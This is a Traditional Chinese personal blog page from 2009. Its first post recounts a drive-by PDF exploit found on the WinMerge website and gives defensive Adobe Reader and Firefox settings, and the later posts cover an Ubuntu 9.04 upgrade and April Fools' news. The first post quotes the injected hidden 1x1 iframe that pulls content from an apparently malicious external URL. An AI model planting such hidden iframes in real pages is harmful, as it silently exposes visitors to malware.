2009年4月27日 星期一

關閉Adobe Reader外掛程式

前一陣子看網路新聞有看到,有網站在利用Adobe Reader的漏洞在使用者的電腦上安裝惡意軟體,上星期工作的時候真的遇到了,而且防毒軟體還沒有警告,幸好我的Adobe Reader已經有事先更新到最新版,所以沒有中毒。不過這讓我想要防患於未然,以免以後遇到Adobe Reader來不及更新的時候中招,尤其Adobe的程式的安全性更新的速度似乎不是很快,上次居然漏洞已經被利用了兩星期後才推出更新程式,所以自己先做好防範措施應該會更好。

事情是這樣發生的:上個星期在瀏覽WinMerge網站要檢查是否有新版程式更新的時候,突然跳出一個Adobe Reader,裡面有一個充滿亂碼的pdf檔案,而且這個檔案還要求執行JavaScript,一副就很可疑的樣子,檢視網頁的程式碼後發現有以下這一段被加入到網頁的最後面:(注意:底下的網址可能含有未知惡意程式,請不要因為好奇而手動開啟;而WinMerge的網頁在隔天再看就已經修復了)

<iframe src="http://betbigwager.cn/in.cgi?income61" style="visibility: hidden;" height="1" width="1"> 

所以顯然是因為那個iframe內含有惡意的pdf檔案,然後加上我以前設定為不「在瀏覽器中顯示PDF」(如下圖),才會看到這個檔案,否則依照Adobe預設的設定,檔案就可能在使用者看不到的地方開啟了。

另外為了以防萬一,我從網路上查詢了一些資料,上面有建議關閉Adobe Reader的「啟用Acrobat JavaScript」(如下圖),因為有些惡意軟體就是利用這個Script功能的漏洞執行的。

但是這樣還是不夠讓我覺得安心,所以我還在Firefox的「工具→附加元件→外掛程式」中,停用了Adobe Acrobat的plug-in,因為我可以把PDF檔案下載到電腦以後再開啟,沒必要直接在瀏覽器中開啟,所以關閉這個plug-in對我來說並沒有任何不便。

當然,一定會有人認為設定了那麼多東西還不如直接換一個PDF Viewer,這部份我有在嘗試一些替代方案,只是還不確定這些替代的程式是不是顯示結果正確美觀、功能好用、以及更安全,所以還是先這樣用吧。

2009年4月24日 星期五

Ubuntu 9.04釋出了

雖然右邊的Ubuntu貼紙還是寫著「Coming soon」,但是Ubuntu 8.10內建的更新管理員已經提示「有新的發行版'9.04'」了,先嘗試升級我爸爸的電腦。把8.10的更新套件都更新到最新以後就開始升級;下載更新套件大約花了一小時,安裝則大約40分鐘,總共在兩小時內搞定。

裝完第一個發現的不同點是開關機的畫面更換了,在我開始使用Ubuntu以來,預設的開關機畫面似乎是第一次更換,而且開機的速度似乎有更快了一些。

不過更重要的是,因為XWindow與顯示驅動程式升級的緣故,在我爸爸的主機板內建顯示上終於可以同時使用3D桌面特效與XVideo加速影片播放了,之前兩者同時使用的時候影片都會閃爍。希望在我的電腦上也可以實現這一點,不然為了播放影片的需求就不能使用3D桌面特效真的有點可惜。

不過我這個星期的假日要去旅遊,我能在明天晚上把我自己的電腦更新好嗎?還是要等旅遊回來後再更新呢?

後記:後來我還是忍不住按下升級按鈕,讓更新程式下載更新套件,我則是洗澡睡覺去了;早上起床才繼續把程式裝完。不過很遺憾的,測試在我的電腦上同時使用Compiz 3D桌面與XVideo影片播放時,雖然不像上一版會導致影片閃爍,但是播放的速度卻很頓,而且CPU使用率很高,結果還是沒辦法啊。

不過更新到9.04後,套件庫內的OpenOffice.org終於更新到3.0了,也提供Firefox 3.1 Beta可以選擇了,還有一堆的應用程式更新,應該還會有一些驚喜。還有這一版的PulseAudio感覺有比上一版更好用了。還有似乎因為Linux核心的更新所以可以不需要安裝powernowd就可以自動調整我的CPU頻率了。

2009年4月2日 星期四

今年的愚人節結束了

雖然因為我缺乏創意,所以我從不在愚人節做捉弄人的活動;不過我很享受每年愚人節的時候外國的新聞網站上出現的各種惡作劇新聞。不過往年大多是外國的新聞感覺比較有趣(例如去年英國BBC的「會飛的企鵝」紀錄片),國內的新聞也許是因為比較沒在注意所以就沒有甚麼印象了。

不過今年看到的第一篇惡作劇卻是Mozilla Taiwan立即體驗IE8最新功能。不僅是惡作劇而已,而且很實用;事實上因為IE8新增的一部份(例如「加速器」和「Web Slices」)功能實在是太簡單,所以去年微軟剛公佈Beta版的時候就馬上有志願者做出同等功能的擴充套件,甚至做到比微軟的版本更強大更多功能。只不過因為缺乏宣傳所以有部份使用者不知道其實靠擴充套件就能讓Fx擁有這些功能。所以我覺得今年MozTW的這個活動算是既有趣又有意義呢。

不過依照印象,早上時這個網頁的內容與現在似乎有點不同,現在的內容比較有趣的樣子(例如「速度快」這個分頁的文章)。